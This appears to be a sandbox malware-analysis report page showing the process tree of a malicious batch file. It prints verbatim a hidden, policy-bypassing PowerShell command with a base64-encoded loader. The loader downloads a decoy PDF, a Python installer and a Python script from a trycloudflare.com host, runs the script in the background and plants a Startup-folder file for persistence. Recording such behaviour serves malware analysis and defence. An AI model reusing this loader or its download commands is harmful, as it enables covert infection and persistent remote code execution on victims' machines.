| ZeroBOX

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "IALlcyCOe" C:\Users\test22\AppData\Local\Temp\sch.bat
2540
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\sch.bat
  2612
  - powershell.exe powershell -NoP -NonI -W Hidden -Exec Bypass -C "$b64='QGVjaG8gb2ZmDQpzZXRsb2NhbA0KDQo6OiBTZXQgdGhlIGJhc2UgVVJMIGZvciBkb3dubG9hZHMNCnNldCAiYmFzZVVybD1odHRwczovL2FyYml0cmFyeS1icnV0YWwtZGVzcGVyYXRlLXBhZ2UudHJ5Y2xvdWRmbGFyZS5jb20iDQoNCjo6IERvd25sb2FkIHRoZSBmaWxlIChlLmcuLCBpbWFnZSBvciBXb3JkIGRvY3VtZW50KQ0Kc2V0ICJmaWxlVXJsPSViYXNlVXJsJS9wZGYvc2NoLnBkZiINCnNldCAiZmlsZURlc3RpbmF0aW9uPSVURU1QJVxzY2gucGRmIg0KZWNobyBEb3dubG9hZGluZyBmaWxlLi4uDQpwb3dlcnNoZWxsIC1Db21tYW5kICImIHsgW05ldC5TZXJ2aWNlUG9pbnRNYW5hZ2VyXTo6U2VjdXJpdHlQcm90b2NvbCA9IFtOZXQuU2VjdXJpdHlQcm90b2NvbFR5cGVdOjpUbHMxMjsgSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnJWZpbGVVcmwlJyAtT3V0RmlsZSAnJWZpbGVEZXN0aW5hdGlvbiUnIH0iDQoNCjo6IE9wZW4gdGhlIGZpbGUNCmVjaG8gT3BlbmluZyBmaWxlOiAlZmlsZURlc3RpbmF0aW9uJQ0Kc3RhcnQgIiIgIiVmaWxlRGVzdGluYXRpb24lIg0KDQo6OiBTZXQgUHl0aG9uIGluc3RhbGxlciBVUkwgYW5kIGRvd25sb2FkIGxvY2F0aW9uDQpzZXQgInB5dGhvblVybD1odHRwczovL2FyYml0cmFyeS1icnV0YWwtZGVzcGVyYXRlLXBhZ2UudHJ5Y2xvdWRmbGFyZS5jb20vcHl0aG9uLTMuMTIuNS1hbWQ2NC5leGUiDQpzZXQgInB5dGhvbkluc3RhbGxlcj0lQVBQREFUQSVccHl0aG9uLTMuMTIuNS1hbWQ2NC5leGUiDQpzZXQgImluc3RhbGxEaXI9JUFQUERBVEElXFB5dGhvblxQeXRob24zLjEyLjUiDQoNCjo6IERvd25sb2FkIHRoZSBQeXRob24gaW5zdGFsbGVyDQplY2hvIERvd25sb2FkaW5nIFB5dGhvbiBpbnN0YWxsZXIuLi4NCnBvd2Vyc2hlbGwgLUNvbW1hbmQgIiYgeyBbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpICclcHl0aG9uVXJsJScgLU91dEZpbGUgJyVweXRob25JbnN0YWxsZXIlJyB9Ig0KDQo6OiBJbnN0YWxsIFB5dGhvbiB3aXRoIHVzZXIgcHJpdmlsZWdlcyAobm8gYWRtaW4gcmVxdWlyZWQpDQplY2hvIEluc3RhbGxpbmcgUHl0aG9uIDMuMTIuNS4uLg0KJXB5dGhvbkluc3RhbGxlciUgL3F1aWV0IEluc3RhbGxBbGxVc2Vycz0wIFRhcmdldERpcj0laW5zdGFsbERpciUgUHJlcGVuZFBhdGg9MQ0KaWYgJUVSUk9STEVWRUwlIG5lcSAwICgNCiAgICBlY2hvIFB5dGhvbiBpbnN0YWxsYXRpb24gZmFpbGVkLg0KICAgIGV4aXQgL2IgMQ0KKQ0KDQo6OiBDbGVhbiB1cCBpbnN0YWxsZXINCmRlbCAlcHl0aG9uSW5zdGFsbGVyJQ0KDQo6OiBEb3dubG9hZCBQeXRob24gc2NyaXB0cyB0byB0aGUgUHl0aG9uIGluc3RhbGxhdGlvbiBkaXJlY3RvcnkNCmVjaG8gRG93bmxvYWRpbmcgUHl0aG9uIHNjcmlwdHMuLi4NCmlmIG5vdCBleGlzdCAiJWluc3RhbGxEaXIlIiBta2RpciAiJWluc3RhbGxEaXIlIg0KDQpwb3dlcnNoZWxsIC1Db21tYW5kICImIHsgSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnJWJhc2VVcmwlLzkxMS5weScgLU91dEZpbGUgJyVpbnN0YWxsRGlyJVw5MTEucHknIH0iDQoNCjo6IE5hdmlnYXRlIHRvIHRoZSBQeXRob24gaW5zdGFsbGF0aW9uIGRpcmVjdG9yeSBhbmQgcnVuIHRoZSBzY3JpcHRzIGluIHRoZSBiYWNrZ3JvdW5kDQplY2hvIFJ1bm5pbmcgUHl0aG9uIHNjcmlwdHMgaW4gdGhlIGJhY2tncm91bmQuLi4NCmNkIC9kICIlaW5zdGFsbERpciUiDQpzdGFydCAvYiAiIiAiJWluc3RhbGxEaXIlXHB5dGhvbi5leGUiIDkxMS5weQ0KDQo6OiBEb3dubG9hZCB0aGUgc3RhcnQuY21kIGZpbGUgYW5kIHBsYWNlIGl0IGluIHRoZSBzdGFydHVwIGZvbGRlcg0KZWNobyBEb3dubG9hZGluZyBzdGFydC5jbWQgZmlsZS4uLg0Kc2V0ICJjbWRVcmw9JWJhc2VVcmwlL3N0YXJ0LmNtZCINCnNldCAiY21kRGVzdGluYXRpb249JUFQUERBVEElXHVwZGF0ZS5jbWQiDQpwb3dlcnNoZWxsIC1Db21tYW5kICImIHsgSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnJWNtZFVybCUnIC1PdXRGaWxlICclY21kRGVzdGluYXRpb24lJyB9Ig0KDQo6OiBNb3ZlIHN0YXJ0LmNtZCB0byB0aGUgc3RhcnR1cCBmb2xkZXINCmVjaG8gTW92aW5nIHN0YXJ0LmNtZCBmaWxlIHRvIHN0YXJ0dXAgZm9sZGVyLi4uDQpzZXQgInN0YXJ0dXBGb2xkZXI9JUFQUERBVEElXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cCINCm1vdmUgIiVjbWREZXN0aW5hdGlvbiUiICIlc3RhcnR1cEZvbGRlciUiDQoNCjo6IENsZWFuIHVwDQplY2hvIENsZWFuaW5nIHVwLi4uDQoNCjo6IEhpZGUgdGhlIFB5dGhvbiBpbnN0YWxsYXRpb24gZm9sZGVyDQphdHRyaWIgK2ggIiVpbnN0YWxsRGlyJSINCg0KOjogU2NyaXB0IGV4ZWN1dGlvbiBjb21wbGV0ZWQNCmVjaG8gU2NyaXB0IGV4ZWN1dGlvbiBjb21wbGV0ZWQuDQplbmRsb2NhbA==';$b=[System.Convert]::FromBase64String($b64);$s=[System.Text.Encoding]::ASCII.GetString($b);$f='obf-sch_decoded.bat';Set-Content -Path $f -Value $s;Start-Process $f -WindowStyle Hidden"
    2700
    - cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\obf-sch_decoded.bat" "
      2816
      - powershell.exe powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://arbitrary-brutal-desperate-page.trycloudflare.com/pdf/sch.pdf' -OutFile 'C:\Users\test22\AppData\Local\Temp\sch.pdf' }"
        2896
      - powershell.exe powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://arbitrary-brutal-desperate-page.trycloudflare.com/python-3.12.5-amd64.exe' -OutFile 'C:\Users\test22\AppData\Roaming\python-3.12.5-amd64.exe' }"
        3056

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents